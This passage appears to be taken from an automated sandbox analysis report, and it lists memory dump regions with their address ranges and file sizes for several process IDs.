                                                                                                                                                                1.5MB

                                                                                                                                                              • memory/2920-1557-0x00007FF944130000-0x00007FF944154000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                144KB

                                                                                                                                                              • memory/2920-1556-0x00007FF940350000-0x00007FF9407B6000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.4MB

                                                                                                                                                              • memory/2920-1498-0x00007FF943E10000-0x00007FF943E28000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                96KB

                                                                                                                                                              • memory/2920-1499-0x00007FF943DF0000-0x00007FF943E09000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                100KB

                                                                                                                                                              • memory/2920-1507-0x00007FF94E2F0000-0x00007FF94E2FD000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                52KB

                                                                                                                                                              • memory/2920-1506-0x00007FF93C990000-0x00007FF93C9A5000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                84KB

                                                                                                                                                              • memory/2920-1500-0x00007FF951EC0000-0x00007FF951ECD000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                52KB

                                                                                                                                                              • memory/2920-1496-0x00007FF952F20000-0x00007FF952F3F000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                124KB

                                                                                                                                                              • memory/2920-78-0x00007FF940350000-0x00007FF9407B6000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.4MB

                                                                                                                                                              • memory/2920-1495-0x00007FF952F40000-0x00007FF952F6C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                176KB

                                                                                                                                                              • memory/2920-102-0x00007FF953300000-0x00007FF95330F000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                60KB

                                                                                                                                                              • memory/2920-101-0x00007FF944130000-0x00007FF944154000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                144KB

                                                                                                                                                              • memory/2920-1501-0x00007FF93CA70000-0x00007FF93CA9E000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                184KB

                                                                                                                                                              • memory/2920-162-0x00007FF940350000-0x00007FF9407B6000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.4MB

                                                                                                                                                              • memory/2920-1502-0x00007FF93C9B0000-0x00007FF93CA68000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                736KB

                                                                                                                                                              • memory/4120-79-0x0000000000020000-0x0000000001A6E000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                26.3MB

                                                                                                                                                              • memory/5796-2035-0x000001A5577D0000-0x000001A5577EC000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                112KB

                                                                                                                                                              • memory/5796-2039-0x000001A5577F0000-0x000001A5577F6000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                24KB

                                                                                                                                                              • memory/5796-2032-0x000001A557580000-0x000001A55759C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                112KB

                                                                                                                                                              • memory/5796-2033-0x000001A5575A0000-0x000001A557655000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                724KB

                                                                                                                                                              • memory/5796-2034-0x000001A557660000-0x000001A55766A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                              • memory/5796-2040-0x000001A557800000-0x000001A55780A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                              • memory/5796-2036-0x000001A5577B0000-0x000001A5577BA000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                              • memory/5796-2037-0x000001A557810000-0x000001A55782A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                104KB

                                                                                                                                                              • memory/5796-2038-0x000001A5577C0000-0x000001A5577C8000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                32KB

                                                                                                                                                              • memory/6236-1658-0x000001FE9E990000-0x000001FE9ECBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                3.2MB

                                                                                                                                                              • memory/6236-1677-0x000001FE9DC20000-0x000001FE9DC32000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                72KB

                                                                                                                                                              • memory/6236-1654-0x000001FE9DC50000-0x000001FE9DC72000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                136KB

                                                                                                                                                              • memory/6236-1651-0x000001FE9E890000-0x000001FE9E942000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                712KB

                                                                                                                                                              • memory/6236-1648-0x000001FE9DBE0000-0x000001FE9DC1A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                232KB

                                                                                                                                                              • memory/6236-2334-0x000001FE9F0B0000-0x000001FE9F15A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                680KB

                                                                                                                                                              • memory/6236-1649-0x000001FE9D840000-0x000001FE9D866000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                152KB

                                                                                                                                                              • memory/6236-1642-0x000001FE9D8F0000-0x000001FE9D95A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                424KB

                                                                                                                                                              • memory/6236-1641-0x000001FE9D870000-0x000001FE9D87A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB